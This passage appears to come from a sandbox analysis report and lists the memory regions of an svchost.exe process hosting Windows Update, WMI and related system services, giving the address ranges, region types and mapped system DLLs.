"\\Windows\\System32\\en-US\\ESENT.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\esent.dll.mui") Region: id = 508 start_va = 0x6720000 end_va = 0x672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 509 start_va = 0x67d0000 end_va = 0x684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000067d0000" filename = "" Region: id = 510 start_va = 0x6850000 end_va = 0x685ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 511 start_va = 0x6860000 end_va = 0x686ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006860000" filename = "" Region: id = 512 start_va = 0x6870000 end_va = 0x687ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 513 start_va = 0x6880000 end_va = 0x688ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 514 start_va = 0x6890000 end_va = 0x689ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 515 start_va = 0x68a0000 end_va = 0x68affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 516 start_va = 0x68b0000 end_va = 0x68bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 517 start_va = 0x68c0000 end_va = 0x68cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068c0000" filename = "" Region: id = 518 start_va = 0x68d0000 end_va = 0x68dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068d0000" filename = "" Region: id = 519 start_va = 0x68e0000 end_va = 0x68effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 520 start_va = 0x68f0000 end_va = 0x68f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068f0000" filename = "" Region: id = 521 start_va = 0x6900000 end_va = 0x690ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 522 start_va = 0x6990000 end_va = 0x6994fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 523 start_va = 0x69a0000 end_va = 0x69b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 524 start_va = 0x69c0000 end_va = 0x69c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 525 start_va = 0x69d0000 end_va = 0x69dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 526 start_va = 0x69e0000 end_va = 0x69e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000069e0000" filename = "" Region: id = 527 start_va = 0x6af0000 end_va = 0x6af2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 528 start_va = 0x6b00000 end_va = 0x6b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 529 start_va = 0x6b80000 end_va = 0x6b97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b80000" filename = "" Region: id = 530 start_va = 0x6ba0000 end_va = 0x6c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ba0000" filename = "" Region: id = 531 start_va = 0x6ca0000 end_va = 0x6d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ca0000" filename = "" Region: id = 532 start_va = 0x6da0000 end_va = 0x6e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 533 start_va = 0x6e20000 end_va = 0x6e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e20000" filename = "" Region: id = 534 start_va = 0x6ea0000 end_va = 0x6ea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\usosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usosvc.dll.mui") Region: id = 535 start_va = 0x6eb0000 end_va = 0x6faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006eb0000" filename = "" Region: id = 536 start_va = 0x6fb0000 end_va = 0x6fb7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wpndatabase.db-shm" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Notifications\\wpndatabase.db-shm" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\notifications\\wpndatabase.db-shm") Region: id = 537 start_va = 0x6fc0000 end_va = 0x6fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 538 start_va = 0x6fe0000 end_va = 0x6fe9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 539 start_va = 0x6ff0000 end_va = 0x7049fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 540 start_va = 0x7050000 end_va = 0x7050fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007050000" filename = "" Region: id = 541 start_va = 0x7060000 end_va = 0x706ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 542 start_va = 0x7170000 end_va = 0x726ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007170000" filename = "" Region: id = 543 start_va = 0x7270000 end_va = 0x7365fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernel32.dll.mui" filename = "\\Windows\\System32\\en-US\\kernel32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernel32.dll.mui") Region: id = 544 start_va = 0x7370000 end_va = 0x746ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007370000" filename = "" Region: id = 545 start_va = 0x75f0000 end_va = 0x76effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000075f0000" filename = "" Region: id = 546 start_va = 0x7970000 end_va = 0x79cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007970000" filename = "" Region: id = 547 start_va = 0x79d0000 end_va = 0x79d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 548 start_va = 0x7a00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 549 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 550 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 551 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 552 start_va = 0x8400000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 553 start_va = 0x8500000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 554 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008600000" filename = "" Region: id = 555 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 556 start_va = 0x8800000 end_va = 0x8831fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 557 start_va = 0x8a00000 end_va = 0x8bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 558 start_va = 0x8c00000 end_va = 0x8dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 559 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 560 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 561 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 562 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 563 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 564 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 565 start_va = 0x7ff7ac720000 end_va = 0x7ff7ac730fff monitored = 0 entry_point = 0x7ff7ac724e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 566 start_va = 0x7ffbf2640000 end_va = 0x7ffbf267ffff monitored = 0 entry_point = 0x7ffbf2668030 region_type = mapped_file name = "wuuhosdeployment.dll" filename = "\\Windows\\System32\\wuuhosdeployment.dll" (normalized: "c:\\windows\\system32\\wuuhosdeployment.dll") Region: id = 567 start_va = 0x7ffbf2680000 end_va = 0x7ffbf26fffff monitored = 0 entry_point = 0x7ffbf268b5b0 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 568 start_va = 0x7ffbf28e0000 end_va = 0x7ffbf2c19fff monitored = 0 entry_point = 0x7ffbf29ea560 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 569 start_va = 0x7ffbf42a0000 end_va = 0x7ffbf42b8fff monitored = 0 entry_point = 0x7ffbf42a1870 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 570 start_va = 0x7ffbf42c0000 end_va = 0x7ffbf42e8fff monitored = 0 entry_point = 0x7ffbf42d4f80 region_type = mapped_file name = "windows.networking.sockets.pushenabledapplication.dll" filename = "\\Windows\\System32\\Windows.Networking.Sockets.PushEnabledApplication.dll" (normalized: "c:\\windows\\system32\\windows.networking.sockets.pushenabledapplication.dll") Region: id = 571 start_va = 0x7ffbf42f0000 end_va = 0x7ffbf4308fff monitored = 0 entry_point = 0x7ffbf42f4310 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 572 start_va = 0x7ffbf4f00000 end_va = 0x7ffbf4f1afff monitored = 0 entry_point = 0x7ffbf4f059c0 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 573 start_va = 0x7ffbf5240000 end_va = 0x7ffbf527efff monitored = 0 entry_point = 0x7ffbf5267d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 574 start_va = 0x7ffbf5280000 end_va = 0x7ffbf5326fff monitored = 0 entry_point = 0x7ffbf5302140 region_type = mapped_file name = "wpnprv.dll" filename = "\\Windows\\System32\\wpnprv.dll" (normalized: "c:\\windows\\system32\\wpnprv.dll") Region: id = 575 start_va = 0x7ffbf5330000 end_va = 0x7ffbf5360fff monitored = 0 entry_point = 0x7ffbf533e9a0 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 576 start_va = 0x7ffbf5370000 end_va = 0x7ffbf5452fff monitored = 0 entry_point = 0x7ffbf5392160 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 577 start_va = 0x7ffbf5460000 end_va = 0x7ffbf568cfff monitored = 0 entry_point = 0x7ffbf54b2e50 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 578 start_va = 0x7ffbf58a0000 end_va = 0x7ffbf58cffff monitored = 0 entry_point = 0x7ffbf58c4680 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 579 start_va = 0x7ffbf5950000 end_va = 0x7ffbf5975fff monitored = 0 entry_point = 0x7ffbf595ab40 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 580 start_va = 0x7ffbf59c0000 end_va = 0x7ffbf59d6fff monitored = 0 entry_point = 0x7ffbf59cc6a0 region_type = mapped_file name = "keepaliveprovider.dll" filename = "\\Windows\\System32\\keepaliveprovider.dll" (normalized: "c:\\windows\\system32\\keepaliveprovider.dll") Region: id = 581 start_va = 0x7ffbf5a10000 end_va = 0x7ffbf5a9efff monitored = 0 entry_point = 0x7ffbf5a62170 region_type = mapped_file name = "usosvc.dll" filename = "\\Windows\\System32\\usosvc.dll" (normalized: "c:\\windows\\system32\\usosvc.dll") Region: id = 582 start_va = 0x7ffbf5d20000 end_va = 0x7ffbf5d37fff monitored = 0 entry_point = 0x7ffbf5d28250 region_type = mapped_file name = "shacctprofile.dll" filename = "\\Windows\\System32\\shacctprofile.dll" (normalized: "c:\\windows\\system32\\shacctprofile.dll") Region: id = 583 start_va = 0x7ffbf6000000 end_va = 0x7ffbf6039fff monitored = 0 entry_point = 0x7ffbf6008d70 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 584 start_va = 0x7ffbf6040000 end_va = 0x7ffbf62eafff monitored = 0 entry_point = 0x7ffbf60660c0 region_type = mapped_file name = "wsmsvc.dll" filename = "\\Windows\\System32\\WsmSvc.dll" (normalized: "c:\\windows\\system32\\wsmsvc.dll") Region: id = 585 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a77fff monitored = 0 entry_point = 0x7ffbf6a13d20 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 586 start_va = 0x7ffbf6b80000 end_va = 0x7ffbf6b8afff monitored = 0 entry_point = 0x7ffbf6b82ab0 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 587 start_va = 0x7ffbf6bb0000 end_va = 0x7ffbf6bdffff monitored = 0 entry_point = 0x7ffbf6bc32c0 region_type = mapped_file name = "wsmauto.dll" filename = "\\Windows\\System32\\WsmAuto.dll" (normalized: "c:\\windows\\system32\\wsmauto.dll") Region: id = 588 start_va = 0x7ffbf6c10000 end_va = 0x7ffbf6c1ffff monitored = 0 entry_point = 0x7ffbf6c138f0 region_type = mapped_file name = "ondemandbrokerclient.dll" filename = "\\Windows\\System32\\OnDemandBrokerClient.dll" (normalized: "c:\\windows\\system32\\ondemandbrokerclient.dll") Region: id = 589 start_va = 0x7ffbf6cd0000 end_va = 0x7ffbf6d06fff monitored = 0 entry_point = 0x7ffbf6ceff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 590 start_va = 0x7ffbf6df0000 end_va = 0x7ffbf6e9efff monitored = 0 entry_point = 0x7ffbf6e5f1c0 region_type = mapped_file name = "upshared.dll" filename = "\\Windows\\System32\\upshared.dll" (normalized: "c:\\windows\\system32\\upshared.dll") Region: id = 591 start_va = 0x7ffbf6f30000 end_va = 0x7ffbf6f9afff monitored = 0 entry_point = 0x7ffbf6f72c90 region_type = mapped_file name = "mitigationclient.dll" filename = "\\Windows\\System32\\MitigationClient.dll" (normalized: "c:\\windows\\system32\\mitigationclient.dll") Region: id = 592 start_va = 0x7ffbf7600000 end_va = 0x7ffbf769cfff monitored = 0 entry_point = 0x7ffbf7634640 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 593 start_va = 0x7ffbf76a0000 end_va = 0x7ffbf76c0fff monitored = 0 entry_point = 0x7ffbf76a53e0 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 594 start_va = 0x7ffbf76d0000 end_va = 0x7ffbf7752fff monitored = 0 entry_point = 0x7ffbf76f77a0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 595 start_va = 0x7ffbf7760000 end_va = 0x7ffbf7836fff monitored = 0 entry_point = 0x7ffbf77834d0 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 596 start_va = 0x7ffbf7840000 end_va = 0x7ffbf7883fff monitored = 0 entry_point = 0x7ffbf785f4d0 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 597 start_va = 0x7ffbf7890000 end_va = 0x7ffbf790cfff monitored = 0 entry_point = 0x7ffbf78a5a80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 598 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b36fff monitored = 0 entry_point = 0x7ffbf7b31320 region_type = mapped_file name = "gamestreamingext.dll" filename = "\\Windows\\System32\\gamestreamingext.dll" (normalized: "c:\\windows\\system32\\gamestreamingext.dll") Region: id = 599 start_va = 0x7ffbf7d40000 end_va = 0x7ffbf7f1dfff monitored = 0 entry_point = 0x7ffbf7d703e0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 600 start_va = 0x7ffbfa790000 end_va = 0x7ffbfa881fff monitored = 0 entry_point = 0x7ffbfa7a8ad0 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 601 start_va = 0x7ffbfad20000 end_va = 0x7ffbfae04fff monitored = 0 entry_point = 0x7ffbfadaac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 602 start_va = 0x7ffbfc620000 end_va = 0x7ffbfc68ffff monitored = 0 entry_point = 0x7ffbfc633d40 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 603 start_va = 0x7ffbfd420000 end_va = 0x7ffbfd67dfff monitored = 0 entry_point = 0x7ffbfd488a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 604 start_va = 0x7ffbfdb20000 end_va = 0x7ffbfdbe2fff monitored = 0 entry_point = 0x7ffbfdb2e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 605 start_va = 0x7ffc00150000 end_va = 0x7ffc00293fff monitored = 0 entry_point = 0x7ffc0016bfd0 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 606 start_va = 0x7ffc00c00000 end_va = 0x7ffc00cb7fff monitored = 0 entry_point = 0x7ffc00c0d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 607 start_va = 0x7ffc01e40000 end_va = 0x7ffc01e4cfff monitored = 0 entry_point = 0x7ffc01e44320 region_type = mapped_file name = "usocoreps.dll" filename = "\\Windows\\System32\\usocoreps.dll" (normalized: "c:\\windows\\system32\\usocoreps.dll") Region: id = 608 start_va = 0x7ffc01f40000 end_va = 0x7ffc01f76fff monitored = 0 entry_point = 0x7ffc01f48c10 region_type = mapped_file name = "appextension.dll" filename = "\\Windows\\System32\\AppExtension.dll" (normalized: "c:\\windows\\system32\\appextension.dll") Region: id = 609 start_va = 0x7ffc022c0000 end_va = 0x7ffc022d2fff monitored = 0 entry_point = 0x7ffc022c18a0 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\System32\\tokenbinding.dll" (normalized: "c:\\windows\\system32\\tokenbinding.dll") Region: id = 610 start_va = 0x7ffc022e0000 end_va = 0x7ffc0245afff monitored = 0 entry_point = 0x7ffc0231a620 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 611 start_va = 0x7ffc02f60000 end_va = 0x7ffc0328afff monitored = 0 entry_point = 0x7ffc02ffaa20 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 612 start_va = 0x7ffc03330000 end_va = 0x7ffc03437fff monitored = 0 entry_point = 0x7ffc033c21f0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 613 start_va = 0x7ffc03440000 end_va = 0x7ffc034dbfff monitored = 0 entry_point = 0x7ffc0348f900 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 614 start_va = 0x7ffc034e0000 end_va = 0x7ffc03510fff monitored = 1 entry_point = 0x7ffc034e2ef0 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 615 start_va = 0x7ffc03520000 end_va = 0x7ffc0357ffff monitored = 0 entry_point = 0x7ffc035229d0 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 616 start_va = 0x7ffc03580000 end_va = 0x7ffc035a2fff monitored = 0 entry_point = 0x7ffc035820b0 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 617 start_va = 0x7ffc035b0000 end_va = 0x7ffc035b8fff monitored = 0 entry_point = 0x7ffc035b16f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 618 start_va = 0x7ffc035c0000 end_va = 0x7ffc035d0fff monitored = 0 entry_point = 0x7ffc035c1970 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 619 start_va = 0x7ffc03750000 end_va = 0x7ffc0382afff monitored = 0 entry_point = 0x7ffc037f4140 region_type = mapped_file name = "winsqlite3.dll" filename = "\\Windows\\System32\\winsqlite3.dll" (normalized: "c:\\windows\\system32\\winsqlite3.dll") Region: id = 620 start_va = 0x7ffc03830000 end_va = 0x7ffc039a3fff monitored = 0 entry_point = 0x7ffc0387d6e0 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 621 start_va = 0x7ffc039b0000 end_va = 0x7ffc039cdfff monitored = 0 entry_point = 0x7ffc039b4a70 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 622 start_va = 0x7ffc039d0000 end_va = 0x7ffc039f2fff monitored = 0 entry_point = 0x7ffc039d4e70 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 623 start_va = 0x7ffc03a00000 end_va = 0x7ffc03a25fff monitored = 0 entry_point = 0x7ffc03a01a90 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 624 start_va = 0x7ffc03a30000 end_va = 0x7ffc03b03fff monitored = 0 entry_point = 0x7ffc03a46ff0 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 625 start_va = 0x7ffc03b10000 end_va = 0x7ffc03b4ffff monitored = 0 entry_point = 0x7ffc03b1c990 region_type = mapped_file name = "wpnservice.dll" filename = "\\Windows\\System32\\wpnservice.dll" (normalized: "c:\\windows\\system32\\wpnservice.dll") Region: id = 626 start_va = 0x7ffc03b50000 end_va = 0x7ffc03ba0fff monitored = 0 entry_point = 0x7ffc03b53f70 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 627 start_va = 0x7ffc03be0000 end_va = 0x7ffc03bf7fff monitored = 0 entry_point = 0x7ffc03be1f50 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 628 start_va = 0x7ffc03c00000 end_va = 0x7ffc03d9bfff monitored = 0 entry_point = 0x7ffc03c15750 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 629 start_va = 0x7ffc03da0000 end_va = 0x7ffc03e25fff monitored = 0 entry_point = 0x7ffc03db5570 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 630 start_va = 0x7ffc03e30000 end_va = 0x7ffc03e6efff monitored = 0 entry_point = 0x7ffc03e36b60 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 631 start_va = 0x7ffc03fc0000 end_va = 0x7ffc04000fff monitored = 0 entry_point = 0x7ffc03fcb610 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 632 start_va = 0x7ffc04240000 end_va = 0x7ffc04250fff monitored = 0 entry_point = 0x7ffc04242aa0 region_type = mapped_file name = "wbemprox.dll" filename = 